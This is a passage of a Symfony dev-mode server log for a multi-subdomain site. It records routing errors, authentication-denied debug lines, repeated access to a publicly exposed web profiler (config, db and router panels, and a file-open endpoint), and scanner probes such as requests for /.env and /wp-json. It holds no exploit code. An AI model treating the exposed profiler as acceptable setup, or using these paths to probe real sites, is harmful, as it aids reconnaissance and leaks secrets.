  2640. [2025-12-17 18:57:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v1/test"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v1/test\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2641. [2025-12-17 18:57:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /en/test"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /en/test\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2642. [2025-12-17 18:58:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /st/test"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /st/test\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2643. [2025-12-17 18:58:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Crm"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Crm\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2644. [2025-12-17 19:09:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b9ce7d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b9ce7d?panel=config","method":"GET"} []
  2645. [2025-12-17 19:09:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  2646. [2025-12-17 19:09:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"623c96","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/623c96?panel=request","method":"GET"} []
  2647. [2025-12-17 19:09:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  2648. [2025-12-17 19:14:15] request.INFO: Matched route "_profiler_search". {"route":"_profiler_search","route_parameters":{"_controller":"web_profiler.controller.profiler:searchAction","_route":"_profiler_search"},"request_uri":"https://auth.unda.co/_profiler/search?limit=10","method":"GET"} []
  2649. [2025-12-17 19:14:18] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"1f08df","_route":"_profiler_search_results"},"request_uri":"https://auth.unda.co/_profiler/1f08df/search/results?limit=10","method":"GET"} []
  2650. [2025-12-17 19:14:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?limit=10","method":"GET"} []
  2651. [2025-12-17 19:18:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2652. [2025-12-17 19:19:49] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
  2653. [2025-12-17 19:24:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"623c96","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/623c96?panel=config","method":"GET"} []
  2654. [2025-12-17 19:24:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  2655. [2025-12-17 19:26:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2656. [2025-12-17 19:26:14] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  2657. [2025-12-17 19:29:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b27c2a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b27c2a?panel=db","method":"GET"} []
  2658. [2025-12-17 19:29:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  2659. [2025-12-17 19:29:15] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://auth.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FWebProfilerBundle&line=0","method":"GET"} []
  2660. [2025-12-17 19:34:19] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2661. [2025-12-17 19:37:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"623c96","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/623c96?panel=cache","method":"GET"} []
  2662. [2025-12-17 19:37:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  2663. [2025-12-17 19:37:59] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  2664. [2025-12-17 19:39:09] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  2665. [2025-12-17 19:41:20] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  2666. [2025-12-17 19:41:20] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  2667. [2025-12-17 19:41:20] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2668. [2025-12-17 19:41:20] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2669. [2025-12-17 19:41:20] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  2670. [2025-12-17 19:41:20] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  2671. [2025-12-17 19:41:20] security.DEBUG: Calling Authentication entry point. [] []
  2672. [2025-12-17 19:41:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /apps"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /apps\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2673. [2025-12-17 19:41:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2674. [2025-12-17 19:41:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/actions"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/actions\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2675. [2025-12-17 19:41:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /_next/data"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /_next/data\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2676. [2025-12-17 19:41:21] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"POST"} []
  2677. [2025-12-17 19:41:21] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  2678. [2025-12-17 19:41:21] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2679. [2025-12-17 19:41:21] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2680. [2025-12-17 19:41:21] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  2681. [2025-12-17 19:41:21] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  2682. [2025-12-17 19:41:21] security.DEBUG: Calling Authentication entry point. [] []
  2683. [2025-12-17 19:43:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/latest?panel=config","method":"GET"} []
  2684. [2025-12-17 19:43:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  2685. [2025-12-17 19:44:15] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://auth.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FFrameworkBundle&line=0","method":"GET"} []
  2686. [2025-12-17 19:44:44] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  2687. [2025-12-17 19:44:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /apps"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /apps\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2688. [2025-12-17 19:44:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2689. [2025-12-17 19:44:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/actions"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/actions\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2690. [2025-12-17 19:44:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /_next/data"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /_next/data\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2691. [2025-12-17 19:44:45] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"POST"} []
  2692. [2025-12-17 19:46:09] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  2693. [2025-12-17 19:46:09] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  2694. [2025-12-17 19:46:09] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  2695. [2025-12-17 19:46:09] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  2696. [2025-12-17 19:46:09] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  2697. [2025-12-17 19:46:09] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  2698. [2025-12-17 19:46:09] security.DEBUG: Calling Authentication entry point. [] []
  2699. [2025-12-17 19:46:09] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"POST"} []
  2700. [2025-12-17 19:46:09] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  2701. [2025-12-17 19:46:09] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  2702. [2025-12-17 19:46:09] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  2703. [2025-12-17 19:46:09] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  2704. [2025-12-17 19:46:09] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  2705. [2025-12-17 19:46:09] security.DEBUG: Calling Authentication entry point. [] []
  2706. [2025-12-17 19:46:09] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"POST"} []
  2707. [2025-12-17 19:46:09] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  2708. [2025-12-17 19:46:09] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  2709. [2025-12-17 19:46:09] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  2710. [2025-12-17 19:46:09] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  2711. [2025-12-17 19:46:09] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  2712. [2025-12-17 19:46:09] security.DEBUG: Calling Authentication entry point. [] []
  2713. [2025-12-17 19:49:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"623c96","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/623c96","method":"GET"} []
  2714. [2025-12-17 19:49:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  2715. [2025-12-17 19:49:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40ca6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f40ca6?panel=form","method":"GET"} []
  2716. [2025-12-17 19:49:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  2717. [2025-12-17 19:55:13] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"39fd77","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/39fd77/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  2718. [2025-12-17 19:55:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  2719. [2025-12-17 19:59:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"545a62","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/545a62?panel=request","method":"GET"} []
  2720. [2025-12-17 19:59:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  2721. [2025-12-17 19:59:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/latest?panel=router","method":"GET"} []
  2722. [2025-12-17 19:59:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  2723. [2025-12-17 19:59:15] request.INFO: Matched route "_profiler_router". {"route":"_profiler_router","route_parameters":{"_controller":"web_profiler.controller.router:panelAction","token":"0bd500","_route":"_profiler_router"},"request_uri":"https://auth.unda.co/_profiler/0bd500/router","method":"GET"} []
  2724. [2025-12-17 20:01:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4ceed5","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4ceed5?panel=request","method":"GET"} []
  2725. [2025-12-17 20:01:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  2726. [2025-12-17 20:04:52] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  2727. [2025-12-17 20:06:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c59856","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c59856","method":"GET"} []
  2728. [2025-12-17 20:06:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  2729. [2025-12-17 20:06:57] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"99d60d","_route":"_wdt"},"request_uri":"https://www.unda.co/_wdt/99d60d","method":"GET"} []
  2730. [2025-12-17 20:08:12] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://auth.unda.co/_profiler/open?file=vendor%2Faws%2Faws-sdk-php-symfony%2Fsrc&line=0","method":"GET"} []
  2731. [2025-12-17 20:08:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=66.249.66.45&limit=10","method":"GET"} []
  2732. [2025-12-17 20:08:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=66.249.66.45&limit=10","method":"GET"} []
  2733. [2025-12-17 20:11:12] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  2734. [2025-12-17 20:11:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /apps"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /apps\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2735. [2025-12-17 20:11:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
